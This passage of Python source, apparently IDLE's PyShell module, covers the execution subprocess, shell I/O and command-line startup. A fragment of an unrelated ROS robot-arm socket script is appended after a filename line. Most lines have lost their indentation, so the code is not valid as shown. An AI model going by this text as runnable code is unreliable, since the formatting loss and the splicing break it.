"Socket should have been assigned a port number.")
w = ['-W' + s for s in sys.warnoptions]
# Maybe IDLE is installed and is being accessed via sys.path,
# or maybe it's not installed and the idle.py script is being
# run from the IDLE source directory.
del_exitf = idleConf.GetOption('main', 'General', 'delete-exitfunc',
default=False, type='bool')
if __name__ == 'idlelib.PyShell':
command = "__import__('idlelib.run').run.main(%r)" % (del_exitf,)
else:
command = "__import__('run').main(%r)" % (del_exitf,)
return [sys.executable] + w + ["-c", command, str(self.port)]
def start_subprocess(self):
addr = (HOST, self.port)
# GUI makes several attempts to acquire socket, listens for connection
for i in range(3):
time.sleep(i)
try:
self.rpcclt = MyRPCClient(addr)
break
except OSError as err:
pass
else:
self.display_port_binding_error()
return None
# if PORT was 0, system will assign an 'ephemeral' port. Find it out:
self.port = self.rpcclt.listening_sock.getsockname()[1]
# if PORT was not 0, probably working with a remote execution server
if PORT != 0:
# To allow reconnection within the 2MSL wait (cf. Stevens TCP
# V1, 18.6), set SO_REUSEADDR. Note that this can be problematic
# on Windows since the implementation allows two active sockets on
# the same address!
self.rpcclt.listening_sock.setsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR, 1)
self.spawn_subprocess()
#time.sleep(20) # test to simulate GUI not accepting connection
# Accept the connection from the Python execution server
self.rpcclt.listening_sock.settimeout(10)
try:
self.rpcclt.accept()
except socket.timeout as err:
self.display_no_subprocess_error()
return None
self.rpcclt.register("console", self.tkconsole)
self.rpcclt.register("stdin", self.tkconsole.stdin)
self.rpcclt.register("stdout", self.tkconsole.stdout)
self.rpcclt.register("stderr", self.tkconsole.stderr)
self.rpcclt.register("flist", self.tkconsole.flist)
self.rpcclt.register("linecache", linecache)
self.rpcclt.register("interp", self)
self.transfer_path(with_cwd=True)
self.poll_subprocess()
return self.rpcclt
def restart_subprocess(self, with_cwd=False):
if self.restarting:
return self.rpcclt
self.restarting = True
# close only the subprocess debugger
debug = self.getdebugger()
if debug:
try:
# Only close subprocess debugger, don't unregister gui_adap!
RemoteDebugger.close_subprocess_debugger(self.rpcclt)
except:
pass
# Kill subprocess, spawn a new one, accept connection.
self.rpcclt.close()
self.terminate_subprocess()
console = self.tkconsole
was_executing = console.executing
console.executing = False
self.spawn_subprocess()
try:
self.rpcclt.accept()
except socket.timeout as err:
self.display_no_subprocess_error()
return None
self.transfer_path(with_cwd=with_cwd)
console.stop_readline()
# annotate restart in shell window and mark it
console.text.delete("iomark", "end-1c")
if was_executing:
console.write('\n')
console.showprompt()
halfbar = ((int(console.width) - 16) // 2) * '='
console.write(halfbar + ' RESTART ' + halfbar)
console.text.mark_set("restart", "end-1c")
console.text.mark_gravity("restart", "left")
console.showprompt()
# restart subprocess debugger
if debug:
# Restarted debugger connects to current instance of debug GUI
gui = RemoteDebugger.restart_subprocess_debugger(self.rpcclt)
# reload remote debugger breakpoints for all PyShellEditWindows
debug.load_breakpoints()
self.compile.compiler.flags = self.original_compiler_flags
self.restarting = False
return self.rpcclt
def __request_interrupt(self):
self.rpcclt.remotecall("exec", "interrupt_the_server", (), {})
def interrupt_subprocess(self):
threading.Thread(target=self.__request_interrupt).start()
def kill_subprocess(self):
if self._afterid is not None:
self.tkconsole.text.after_cancel(self._afterid)
try:
self.rpcclt.listening_sock.close()
except AttributeError: # no socket
pass
try:
self.rpcclt.close()
except AttributeError: # no socket
pass
self.terminate_subprocess()
self.tkconsole.executing = False
self.rpcclt = None
def terminate_subprocess(self):
"Make sure subprocess is terminated"
try:
self.rpcsubproc.kill()
except OSError:
# process already terminated
return
else:
try:
self.rpcsubproc.wait()
except OSError:
return
def transfer_path(self, with_cwd=False):
if with_cwd: # Issue 13506
path = [''] # include Current Working Directory
path.extend(sys.path)
else:
path = sys.path
self.runcommand("""if 1:
import sys as _sys
_sys.path = %r
del _sys
\n""" % (path,))
active_seq = None
def poll_subprocess(self):
clt = self.rpcclt
if clt is None:
return
try:
response = clt.pollresponse(self.active_seq, wait=0.05)
except (EOFError, OSError, KeyboardInterrupt):
# lost connection or subprocess terminated itself, restart
# [the KBI is from rpc.SocketIO.handle_EOF()]
if self.tkconsole.closing:
return
response = None
self.restart_subprocess()
if response:
self.tkconsole.resetoutput()
self.active_seq = None
how, what = response
console = self.tkconsole.console
if how == "OK":
if what is not None:
print(repr(what), file=console)
elif how == "EXCEPTION":
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.remote_stack_viewer()
elif how == "ERROR":
errmsg = "PyShell.ModifiedInterpreter: Subprocess ERROR:\n"
print(errmsg, what, file=sys.__stderr__)
print(errmsg, what, file=console)
# we received a response to the currently active seq number:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
# Reschedule myself
if not self.tkconsole.closing:
self._afterid = self.tkconsole.text.after(
self.tkconsole.pollinterval, self.poll_subprocess)
debugger = None
def setdebugger(self, debugger):
self.debugger = debugger
def getdebugger(self):
return self.debugger
def open_remote_stack_viewer(self):
"""Initiate the remote stack viewer from a separate thread.
This method is called from the subprocess, and by returning from this
method we allow the subprocess to unblock. After a bit the shell
requests the subprocess to open the remote stack viewer which returns a
static object looking at the last exception. It is queried through
the RPC mechanism.
"""
self.tkconsole.text.after(300, self.remote_stack_viewer)
return
def remote_stack_viewer(self):
from idlelib import RemoteObjectBrowser
oid = self.rpcclt.remotequeue("exec", "stackviewer", ("flist",), {})
if oid is None:
self.tkconsole.root.bell()
return
item = RemoteObjectBrowser.StubObjectTreeItem(self.rpcclt, oid)
from idlelib.TreeWidget import ScrolledCanvas, TreeNode
top = Toplevel(self.tkconsole.root)
theme = idleConf.GetOption('main','Theme','name')
background = idleConf.GetHighlight(theme, 'normal')['background']
sc = ScrolledCanvas(top, bg=background, highlightthickness=0)
sc.frame.pack(expand=1, fill="both")
node = TreeNode(sc.canvas, None, item)
node.expand()
# XXX Should GC the remote tree when closing the window
gid = 0
def execsource(self, source):
"Like runsource() but assumes complete exec source"
filename = self.stuffsource(source)
self.execfile(filename, source)
def execfile(self, filename, source=None):
"Execute an existing file"
if source is None:
with tokenize.open(filename) as fp:
source = fp.read()
try:
code = compile(source, filename, "exec")
except (OverflowError, SyntaxError):
self.tkconsole.resetoutput()
print('*** Error in script or command!\n'
'Traceback (most recent call last):',
file=self.tkconsole.stderr)
InteractiveInterpreter.showsyntaxerror(self, filename)
self.tkconsole.showprompt()
else:
self.runcode(code)
def runsource(self, source):
"Extend base class method: Stuff the source in the line cache first"
filename = self.stuffsource(source)
self.more = 0
self.save_warnings_filters = warnings.filters[:]
warnings.filterwarnings(action="error", category=SyntaxWarning)
# at the moment, InteractiveInterpreter expects str
assert isinstance(source, str)
#if isinstance(source, str):
# from idlelib import IOBinding
# try:
# source = source.encode(IOBinding.encoding)
# except UnicodeError:
# self.tkconsole.resetoutput()
# self.write("Unsupported characters in input\n")
# return
try:
# InteractiveInterpreter.runsource() calls its runcode() method,
# which is overridden (see below)
return InteractiveInterpreter.runsource(self, source, filename)
finally:
if self.save_warnings_filters is not None:
warnings.filters[:] = self.save_warnings_filters
self.save_warnings_filters = None
def stuffsource(self, source):
"Stuff source in the filename cache"
filename = "<pyshell#%d>" % self.gid
self.gid = self.gid + 1
lines = source.split("\n")
linecache.cache[filename] = len(source)+1, 0, lines, filename
return filename
def prepend_syspath(self, filename):
"Prepend sys.path with file's directory if not already included"
self.runcommand("""if 1:
_filename = %r
import sys as _sys
from os.path import dirname as _dirname
_dir = _dirname(_filename)
if not _dir in _sys.path:
_sys.path.insert(0, _dir)
del _filename, _sys, _dirname, _dir
\n""" % (filename,))
def showsyntaxerror(self, filename=None):
"""Override Interactive Interpreter method: Use Colorizing
Color the offending position instead of printing it and pointing at it
with a caret.
"""
tkconsole = self.tkconsole
text = tkconsole.text
text.tag_remove("ERROR", "1.0", "end")
type, value, tb = sys.exc_info()
msg = getattr(value, 'msg', '') or value or "<no detail available>"
lineno = getattr(value, 'lineno', '') or 1
offset = getattr(value, 'offset', '') or 0
if offset == 0:
lineno += 1 #mark end of offending line
if lineno == 1:
pos = "iomark + %d chars" % (offset-1)
else:
pos = "iomark linestart + %d lines + %d chars" % \
(lineno-1, offset-1)
tkconsole.colorize_syntax_error(text, pos)
tkconsole.resetoutput()
self.write("SyntaxError: %s\n" % msg)
tkconsole.showprompt()
def showtraceback(self):
"Extend base class method to reset output properly"
self.tkconsole.resetoutput()
self.checklinecache()
InteractiveInterpreter.showtraceback(self)
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.tkconsole.open_stack_viewer()
def checklinecache(self):
c = linecache.cache
for key in list(c.keys()):
if key[:1] + key[-1:] != "<>":
del c[key]
def runcommand(self, code):
"Run the code without invoking the debugger"
# The code better not raise an exception!
if self.tkconsole.executing:
self.display_executing_dialog()
return 0
if self.rpcclt:
self.rpcclt.remotequeue("exec", "runcode", (code,), {})
else:
exec(code, self.locals)
return 1
def runcode(self, code):
"Override base class method"
if self.tkconsole.executing:
self.interp.restart_subprocess()
self.checklinecache()
if self.save_warnings_filters is not None:
warnings.filters[:] = self.save_warnings_filters
self.save_warnings_filters = None
debugger = self.debugger
try:
self.tkconsole.beginexecuting()
if not debugger and self.rpcclt is not None:
self.active_seq = self.rpcclt.asyncqueue("exec", "runcode",
(code,), {})
elif debugger:
debugger.run(code, self.locals)
else:
exec(code, self.locals)
except SystemExit:
if not self.tkconsole.closing:
if tkMessageBox.askyesno(
"Exit?",
"Do you want to exit altogether?",
default="yes",
master=self.tkconsole.text):
raise
else:
self.showtraceback()
else:
raise
except:
if use_subprocess:
print("IDLE internal error in runcode()",
file=self.tkconsole.stderr)
self.showtraceback()
self.tkconsole.endexecuting()
else:
if self.tkconsole.canceled:
self.tkconsole.canceled = False
print("KeyboardInterrupt", file=self.tkconsole.stderr)
else:
self.showtraceback()
finally:
if not use_subprocess:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
def write(self, s):
"Override base class method"
return self.tkconsole.stderr.write(s)
def display_port_binding_error(self):
tkMessageBox.showerror(
"Port Binding Error",
"IDLE can't bind to a TCP/IP port, which is necessary to "
"communicate with its Python execution server. This might be "
"because no networking is installed on this computer. "
"Run IDLE with the -n command line switch to start without a "
"subprocess and refer to Help/IDLE Help 'Running without a "
"subprocess' for further details.",
master=self.tkconsole.text)
def display_no_subprocess_error(self):
tkMessageBox.showerror(
"Subprocess Startup Error",
"IDLE's subprocess didn't make connection. Either IDLE can't "
"start a subprocess or personal firewall software is blocking "
"the connection.",
master=self.tkconsole.text)
def display_executing_dialog(self):
tkMessageBox.showerror(
"Already executing",
"The Python Shell window is already executing a command; "
"please wait until it is finished.",
master=self.tkconsole.text)
class PyShell(OutputWindow):
shell_title = "Python " + python_version() + " Shell"
# Override classes
ColorDelegator = ModifiedColorDelegator
UndoDelegator = ModifiedUndoDelegator
# Override menus
menu_specs = [
("file", "_File"),
("edit", "_Edit"),
("debug", "_Debug"),
("options", "_Options"),
("windows", "_Windows"),
("help", "_Help"),
]
if sys.platform == "darwin":
menu_specs[-2] = ("windows", "_Window")
# New classes
from idlelib.IdleHistory import History
def __init__(self, flist=None):
if use_subprocess:
ms = self.menu_specs
if ms[2][0] != "shell":
ms.insert(2, ("shell", "She_ll"))
self.interp = ModifiedInterpreter(self)
if flist is None:
root = Tk()
fixwordbreaks(root)
root.withdraw()
flist = PyShellFileList(root)
#
OutputWindow.__init__(self, flist, None, None)
#
## self.config(usetabs=1, indentwidth=8, context_use_ps1=1)
self.usetabs = True
# indentwidth must be 8 when using tabs. See note in EditorWindow:
self.indentwidth = 8
self.context_use_ps1 = True
#
text = self.text
text.configure(wrap="char")
text.bind("<<newline-and-indent>>", self.enter_callback)
text.bind("<<plain-newline-and-indent>>", self.linefeed_callback)
text.bind("<<interrupt-execution>>", self.cancel_callback)
text.bind("<<end-of-file>>", self.eof_callback)
text.bind("<<open-stack-viewer>>", self.open_stack_viewer)
text.bind("<<toggle-debugger>>", self.toggle_debugger)
text.bind("<<toggle-jit-stack-viewer>>", self.toggle_jit_stack_viewer)
if use_subprocess:
text.bind("<<view-restart>>", self.view_restart_mark)
text.bind("<<restart-shell>>", self.restart_shell)
#
self.save_stdout = sys.stdout
self.save_stderr = sys.stderr
self.save_stdin = sys.stdin
from idlelib import IOBinding
self.stdin = PseudoInputFile(self, "stdin", IOBinding.encoding)
self.stdout = PseudoOutputFile(self, "stdout", IOBinding.encoding)
self.stderr = PseudoOutputFile(self, "stderr", IOBinding.encoding)
self.console = PseudoOutputFile(self, "console", IOBinding.encoding)
if not use_subprocess:
sys.stdout = self.stdout
sys.stderr = self.stderr
sys.stdin = self.stdin
try:
# page help() text to shell.
import pydoc # import must be done here to capture i/o rebinding.
# XXX KBK 27Dec07 use a textView someday, but must work w/o subproc
pydoc.pager = pydoc.plainpager
except:
sys.stderr = sys.__stderr__
raise
#
self.history = self.History(self.text)
#
self.pollinterval = 50 # millisec
def get_standard_extension_names(self):
return idleConf.GetExtensions(shell_only=True)
reading = False
executing = False
canceled = False
endoffile = False
closing = False
_stop_readline_flag = False
def set_warning_stream(self, stream):
global warning_stream
warning_stream = stream
def get_warning_stream(self):
return warning_stream
def toggle_debugger(self, event=None):
if self.executing:
tkMessageBox.showerror("Don't debug now",
"You can only toggle the debugger when idle",
master=self.text)
self.set_debugger_indicator()
return "break"
else:
db = self.interp.getdebugger()
if db:
self.close_debugger()
else:
self.open_debugger()
def set_debugger_indicator(self):
db = self.interp.getdebugger()
self.setvar("<<toggle-debugger>>", not not db)
def toggle_jit_stack_viewer(self, event=None):
pass # All we need is the variable
def close_debugger(self):
db = self.interp.getdebugger()
if db:
self.interp.setdebugger(None)
db.close()
if self.interp.rpcclt:
RemoteDebugger.close_remote_debugger(self.interp.rpcclt)
self.resetoutput()
self.console.write("[DEBUG OFF]\n")
sys.ps1 = ">>> "
self.showprompt()
self.set_debugger_indicator()
def open_debugger(self):
if self.interp.rpcclt:
dbg_gui = RemoteDebugger.start_remote_debugger(self.interp.rpcclt,
self)
else:
dbg_gui = Debugger.Debugger(self)
self.interp.setdebugger(dbg_gui)
dbg_gui.load_breakpoints()
sys.ps1 = "[DEBUG ON]\n>>> "
self.showprompt()
self.set_debugger_indicator()
def beginexecuting(self):
"Helper for ModifiedInterpreter"
self.resetoutput()
self.executing = 1
def endexecuting(self):
"Helper for ModifiedInterpreter"
self.executing = 0
self.canceled = 0
self.showprompt()
def close(self):
"Extend EditorWindow.close()"
if self.executing:
response = tkMessageBox.askokcancel(
"Kill?",
"The program is still running!\n Do you want to kill it?",
default="ok",
parent=self.text)
if response is False:
return "cancel"
self.stop_readline()
self.canceled = True
self.closing = True
return EditorWindow.close(self)
def _close(self):
"Extend EditorWindow._close(), shut down debugger and execution server"
self.close_debugger()
if use_subprocess:
self.interp.kill_subprocess()
# Restore std streams
sys.stdout = self.save_stdout
sys.stderr = self.save_stderr
sys.stdin = self.save_stdin
# Break cycles
self.interp = None
self.console = None
self.flist.pyshell = None
self.history = None
EditorWindow._close(self)
def ispythonsource(self, filename):
"Override EditorWindow method: never remove the colorizer"
return True
def short_title(self):
return self.shell_title
COPYRIGHT = \
'Type "copyright", "credits" or "license()" for more information.'
def begin(self):
self.text.mark_set("iomark", "insert")
self.resetoutput()
if use_subprocess:
nosub = ''
client = self.interp.start_subprocess()
if not client:
self.close()
return False
else:
nosub = ("==== No Subprocess ====\n\n" +
"WARNING: Running IDLE without a Subprocess is deprecated\n" +
"and will be removed in a later version. See Help/IDLE Help\n" +
"for details.\n\n")
sys.displayhook = rpc.displayhook
self.write("Python %s on %s\n%s\n%s" %
(sys.version, sys.platform, self.COPYRIGHT, nosub))
self.showprompt()
import tkinter
tkinter._default_root = None # 03Jan04 KBK What's this?
return True
def stop_readline(self):
if not self.reading: # no nested mainloop to exit.
return
self._stop_readline_flag = True
self.top.quit()
def readline(self):
save = self.reading
try:
self.reading = 1
self.top.mainloop() # nested mainloop()
finally:
self.reading = save
if self._stop_readline_flag:
self._stop_readline_flag = False
return ""
line = self.text.get("iomark", "end-1c")
if len(line) == 0: # may be EOF if we quit our mainloop with Ctrl-C
line = "\n"
self.resetoutput()
if self.canceled:
self.canceled = 0
if not use_subprocess:
raise KeyboardInterrupt
if self.endoffile:
self.endoffile = 0
line = ""
return line
def isatty(self):
return True
def cancel_callback(self, event=None):
try:
if self.text.compare("sel.first", "!=", "sel.last"):
return # Active selection -- always use default binding
except:
pass
if not (self.executing or self.reading):
self.resetoutput()
self.interp.write("KeyboardInterrupt\n")
self.showprompt()
return "break"
self.endoffile = 0
self.canceled = 1
if (self.executing and self.interp.rpcclt):
if self.interp.getdebugger():
self.interp.restart_subprocess()
else:
self.interp.interrupt_subprocess()
if self.reading:
self.top.quit() # exit the nested mainloop() in readline()
return "break"
def eof_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (delete next char) take over
if not (self.text.compare("iomark", "==", "insert") and
self.text.compare("insert", "==", "end-1c")):
return # Let the default binding (delete next char) take over
if not self.executing:
self.resetoutput()
self.close()
else:
self.canceled = 0
self.endoffile = 1
self.top.quit()
return "break"
def linefeed_callback(self, event):
# Insert a linefeed without entering anything (still autoindented)
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
return "break"
def enter_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (insert '\n') take over
# If some text is selected, recall the selection
        # (but only if it is before the I/O mark)
try:
sel = self.text.get("sel.first", "sel.last")
if sel:
if self.text.compare("sel.last", "<=", "iomark"):
self.recall(sel, event)
return "break"
except:
pass
# If we're strictly before the line containing iomark, recall
# the current line, less a leading prompt, less leading or
# trailing whitespace
if self.text.compare("insert", "<", "iomark linestart"):
# Check if there's a relevant stdin range -- if so, use it
prev = self.text.tag_prevrange("stdin", "insert")
if prev and self.text.compare("insert", "<", prev[1]):
self.recall(self.text.get(prev[0], prev[1]), event)
return "break"
next = self.text.tag_nextrange("stdin", "insert")
if next and self.text.compare("insert lineend", ">=", next[0]):
self.recall(self.text.get(next[0], next[1]), event)
return "break"
# No stdin mark -- just get the current line, less any prompt
indices = self.text.tag_nextrange("console", "insert linestart")
if indices and \
self.text.compare(indices[0], "<=", "insert linestart"):
self.recall(self.text.get(indices[1], "insert lineend"), event)
else:
self.recall(self.text.get("insert linestart", "insert lineend"), event)
return "break"
# If we're between the beginning of the line and the iomark, i.e.
# in the prompt area, move to the end of the prompt
if self.text.compare("insert", "<", "iomark"):
self.text.mark_set("insert", "iomark")
# If we're in the current input and there's only whitespace
# beyond the cursor, erase that whitespace first
s = self.text.get("insert", "end-1c")
if s and not s.strip():
self.text.delete("insert", "end-1c")
# If we're in the current input before its last line,
# insert a newline right at the insert point
if self.text.compare("insert", "<", "end-1c linestart"):
self.newline_and_indent_event(event)
return "break"
# We're in the last line; append a newline and submit it
self.text.mark_set("insert", "end-1c")
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
self.text.tag_add("stdin", "iomark", "end-1c")
self.text.update_idletasks()
if self.reading:
self.top.quit() # Break out of recursive mainloop()
else:
self.runit()
return "break"
def recall(self, s, event):
# remove leading and trailing empty or whitespace lines
s = re.sub(r'^\s*\n', '' , s)
s = re.sub(r'\n\s*$', '', s)
lines = s.split('\n')
self.text.undo_block_start()
try:
self.text.tag_remove("sel", "1.0", "end")
self.text.mark_set("insert", "end-1c")
prefix = self.text.get("insert linestart", "insert")
if prefix.rstrip().endswith(':'):
self.newline_and_indent_event(event)
prefix = self.text.get("insert linestart", "insert")
self.text.insert("insert", lines[0].strip())
if len(lines) > 1:
orig_base_indent = re.search(r'^([ \t]*)', lines[0]).group(0)
new_base_indent = re.search(r'^([ \t]*)', prefix).group(0)
for line in lines[1:]:
if line.startswith(orig_base_indent):
# replace orig base indentation with new indentation
line = new_base_indent + line[len(orig_base_indent):]
self.text.insert('insert', '\n'+line.rstrip())
finally:
self.text.see("insert")
self.text.undo_block_stop()
def runit(self):
line = self.text.get("iomark", "end-1c")
# Strip off last newline and surrounding whitespace.
# (To allow you to hit return twice to end a statement.)
i = len(line)
while i > 0 and line[i-1] in " \t":
i = i-1
if i > 0 and line[i-1] == "\n":
i = i-1
while i > 0 and line[i-1] in " \t":
i = i-1
line = line[:i]
more = self.interp.runsource(line)
def open_stack_viewer(self, event=None):
if self.interp.rpcclt:
return self.interp.remote_stack_viewer()
try:
sys.last_traceback
except:
tkMessageBox.showerror("No stack trace",
"There is no stack trace yet.\n"
"(sys.last_traceback is not defined)",
master=self.text)
return
from idlelib.StackViewer import StackBrowser
sv = StackBrowser(self.root, self.flist)
def view_restart_mark(self, event=None):
self.text.see("iomark")
self.text.see("restart")
def restart_shell(self, event=None):
"Callback for Run/Restart Shell Cntl-F6"
self.interp.restart_subprocess(with_cwd=True)
def showprompt(self):
self.resetoutput()
try:
s = str(sys.ps1)
except:
s = ""
self.console.write(s)
self.text.mark_set("insert", "end-1c")
self.set_line_and_column()
self.io.reset_undo()
def resetoutput(self):
source = self.text.get("iomark", "end-1c")
if self.history:
self.history.store(source)
if self.text.get("end-2c") != "\n":
self.text.insert("end-1c", "\n")
self.text.mark_set("iomark", "end-1c")
self.set_line_and_column()
def write(self, s, tags=()):
if isinstance(s, str) and len(s) and max(s) > '\uffff':
# Tk doesn't support outputting non-BMP characters
# Let's assume what printed string is not very long,
# find first non-BMP character and construct informative
# UnicodeEncodeError exception.
for start, char in enumerate(s):
if char > '\uffff':
break
raise UnicodeEncodeError("UCS-2", char, start, start+1,
'Non-BMP character not supported in Tk')
try:
self.text.mark_gravity("iomark", "right")
count = OutputWindow.write(self, s, tags, "iomark")
self.text.mark_gravity("iomark", "left")
except:
raise ###pass # ### 11Aug07 KBK if we are expecting exceptions
# let's find out what they are and be specific.
if self.canceled:
self.canceled = 0
if not use_subprocess:
raise KeyboardInterrupt
return count
def rmenu_check_cut(self):
try:
if self.text.compare('sel.first', '<', 'iomark'):
return 'disabled'
except TclError: # no selection, so the index 'sel.first' doesn't exist
return 'disabled'
return super().rmenu_check_cut()
def rmenu_check_paste(self):
if self.text.compare('insert','<','iomark'):
return 'disabled'
return super().rmenu_check_paste()
class PseudoFile(io.TextIOBase):
def __init__(self, shell, tags, encoding=None):
self.shell = shell
self.tags = tags
self._encoding = encoding
@property
def encoding(self):
return self._encoding
@property
def name(self):
return '<%s>' % self.tags
def isatty(self):
return True
class PseudoOutputFile(PseudoFile):
def writable(self):
return True
def write(self, s):
if self.closed:
raise ValueError("write to closed file")
if type(s) is not str:
if not isinstance(s, str):
raise TypeError('must be str, not ' + type(s).__name__)
# See issue #19481
s = str.__str__(s)
return self.shell.write(s, self.tags)
class PseudoInputFile(PseudoFile):
def __init__(self, shell, tags, encoding=None):
PseudoFile.__init__(self, shell, tags, encoding)
self._line_buffer = ''
def readable(self):
return True
def read(self, size=-1):
if self.closed:
raise ValueError("read from closed file")
if size is None:
size = -1
elif not isinstance(size, int):
raise TypeError('must be int, not ' + type(size).__name__)
result = self._line_buffer
self._line_buffer = ''
if size < 0:
while True:
line = self.shell.readline()
if not line: break
result += line
else:
while len(result) < size:
line = self.shell.readline()
if not line: break
result += line
self._line_buffer = result[size:]
result = result[:size]
return result
def readline(self, size=-1):
if self.closed:
raise ValueError("read from closed file")
if size is None:
size = -1
elif not isinstance(size, int):
raise TypeError('must be int, not ' + type(size).__name__)
line = self._line_buffer or self.shell.readline()
if size < 0:
size = len(line)
eol = line.find('\n', 0, size)
if eol >= 0:
size = eol + 1
self._line_buffer = line[size:]
return line[:size]
def close(self):
self.shell.close()
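# Hedged illustration (not part of IDLE): PseudoInputFile splits whatever the
# shell's readline() returns into size-limited chunks and keeps the remainder
# in _line_buffer. FakeShell below is a stand-in for the real PyShell object,
# used only in this sketch; the function is never called by IDLE itself.
def _pseudo_input_file_example():
    class FakeShell:
        def __init__(self, lines):
            self.lines = list(lines)
        def readline(self):
            return self.lines.pop(0) if self.lines else ''
        def close(self):
            pass
    f = PseudoInputFile(FakeShell(['spam eggs\n']), "stdin", "utf-8")
    assert f.readline(4) == 'spam'    # first chunk; the rest stays buffered
    assert f.readline() == ' eggs\n'  # buffered remainder, up to the newline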
usage_msg = """\
USAGE: idle [-deins] [-t title] [file]*
idle [-dns] [-t title] (-c cmd | -r file) [arg]*
idle [-dns] [-t title] - [arg]*
-h print this help message and exit
-n run IDLE without a subprocess (DEPRECATED,
see Help/IDLE Help for details)
The following options will override the IDLE 'settings' configuration:
-e open an edit window
-i open a shell window
The following options imply -i and will open a shell:
-c cmd run the command in a shell, or
-r file run script from file
-d enable the debugger
-s run $IDLESTARTUP or $PYTHONSTARTUP before anything else
-t title set title of shell window
A default edit window will be bypassed when -c, -r, or - are used.
[arg]* are passed to the command (-c) or script (-r) in sys.argv[1:].
Examples:
idle
Open an edit window or shell depending on IDLE's configuration.
idle foo.py foobar.py
Edit the files, also open a shell if configured to start with shell.
idle -est "Baz" foo.py
Run $IDLESTARTUP or $PYTHONSTARTUP, edit foo.py, and open a shell
window with the title "Baz".
idle -c "import sys; print(sys.argv)" "foo"
Open a shell window and run the command, passing "-c" in sys.argv[0]
and "foo" in sys.argv[1].
idle -d -s -r foo.py "Hello World"
Open a shell window, run a startup script, enable the debugger, and
run foo.py, passing "foo.py" in sys.argv[0] and "Hello World" in
sys.argv[1].
echo "import sys; print(sys.argv)" | idle - "foobar"
Open a shell window, run the script piped in, passing '' in sys.argv[0]
and "foobar" in sys.argv[1].
"""
def main():
global flist, root, use_subprocess
capture_warnings(True)
use_subprocess = True
enable_shell = False
enable_edit = False
debug = False
cmd = None
script = None
startup = False
try:
opts, args = getopt.getopt(sys.argv[1:], "c:deihnr:st:")
except getopt.error as msg:
print("Error: %s\n%s" % (msg, usage_msg), file=sys.stderr)
sys.exit(2)
for o, a in opts:
if o == '-c':
cmd = a
enable_shell = True
if o == '-d':
debug = True
enable_shell = True
if o == '-e':
enable_edit = True
if o == '-h':
sys.stdout.write(usage_msg)
sys.exit()
if o == '-i':
enable_shell = True
if o == '-n':
print(" Warning: running IDLE without a subprocess is deprecated.",
file=sys.stderr)
use_subprocess = False
if o == '-r':
script = a
if os.path.isfile(script):
pass
else:
print("No script file: ", script)
sys.exit()
enable_shell = True
if o == '-s':
startup = True
enable_shell = True
if o == '-t':
PyShell.shell_title = a
enable_shell = True
if args and args[0] == '-':
cmd = sys.stdin.read()
enable_shell = True
# process sys.argv and sys.path:
for i in range(len(sys.path)):
sys.path[i] = os.path.abspath(sys.path[i])
if args and args[0] == '-':
sys.argv = [''] + args[1:]
elif cmd:
sys.argv = ['-c'] + args
elif script:
sys.argv = [script] + args
elif args:
enable_edit = True
pathx = []
for filename in args:
pathx.append(os.path.dirname(filename))
for dir in pathx:
dir = os.path.abspath(dir)
if not dir in sys.path:
sys.path.insert(0, dir)
else:
dir = os.getcwd()
if dir not in sys.path:
sys.path.insert(0, dir)
# check the IDLE settings configuration (but command line overrides)
edit_start = idleConf.GetOption('main', 'General',
'editor-on-startup', type='bool')
enable_edit = enable_edit or edit_start
enable_shell = enable_shell or not enable_edit
# start editor and/or shell windows:
root = Tk(className="Idle")
# set application icon
icondir = os.path.join(os.path.dirname(__file__), 'Icons')
if system() == 'Windows':
iconfile = os.path.join(icondir, 'idle.ico')
root.wm_iconbitmap(default=iconfile)
elif TkVersion >= 8.5:
ext = '.png' if TkVersion >= 8.6 else '.gif'
iconfiles = [os.path.join(icondir, 'idle_%d%s' % (size, ext))
for size in (16, 32, 48)]
icons = [PhotoImage(file=iconfile) for iconfile in iconfiles]
root.wm_iconphoto(True, *icons)
fixwordbreaks(root)
root.withdraw()
flist = PyShellFileList(root)
macosxSupport.setupApp(root, flist)
if enable_edit:
if not (cmd or script):
for filename in args[:]:
if flist.open(filename) is None:
# filename is a directory actually, disconsider it
args.remove(filename)
if not args:
flist.new()
if enable_shell:
shell = flist.open_shell()
if not shell:
return # couldn't open shell
if macosxSupport.isAquaTk() and flist.dict:
# On OSX: when the user has double-clicked on a file that causes
# IDLE to be launched the shell window will open just in front of
# the file she wants to see. Lower the interpreter window when
# there are open files.
shell.top.lower()
else:
shell = flist.pyshell
# Handle remaining options. If any of these are set, enable_shell
# was set also, so shell must be true to reach here.
if debug:
shell.open_debugger()
if startup:
filename = os.environ.get("IDLESTARTUP") or \
os.environ.get("PYTHONSTARTUP")
if filename and os.path.isfile(filename):
shell.interp.execfile(filename)
if cmd or script:
shell.interp.runcommand("""if 1:
import sys as _sys
_sys.argv = %r
del _sys
\n""" % (sys.argv,))
if cmd:
shell.interp.execsource(cmd)
elif script:
shell.interp.prepend_syspath(script)
shell.interp.execfile(script)
elif shell:
# If there is a shell window and no cmd or script in progress,
# check for problematic OS X Tk versions and print a warning
# message in the IDLE shell window; this is less intrusive
# than always opening a separate window.
tkversionwarning = macosxSupport.tkVersionWarning(root)
if tkversionwarning:
shell.interp.runcommand("print('%s')" % tkversionwarning)
while flist.inversedict: # keep IDLE running while files are open.
root.mainloop()
root.destroy()
capture_warnings(False)
if __name__ == "__main__":
sys.modules['PyShell'] = sys.modules['__main__']
main()
capture_warnings(False) # Make sure turned off; see issue 18081
|
HiwinRA605_socket_ros_test_20190626114057.py
|
#!/usr/bin/env python3
# license removed for brevity
# Receive commands from the strategy side and send them to the control PC over a socket
import socket
## multithreading
import threading
import time
##
import sys
import os
import numpy as np
import rospy
import matplotlib as plot
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import enum
Socket = 0
data = '0' # initial value of the transmitted data
Arm_feedback = 1 # assume the arm is busy
state_feedback = 0
NAME = 'socket_server'
client_response = 0 # initial value of the response counter
point_data_flag = False
arm_mode_flag = False
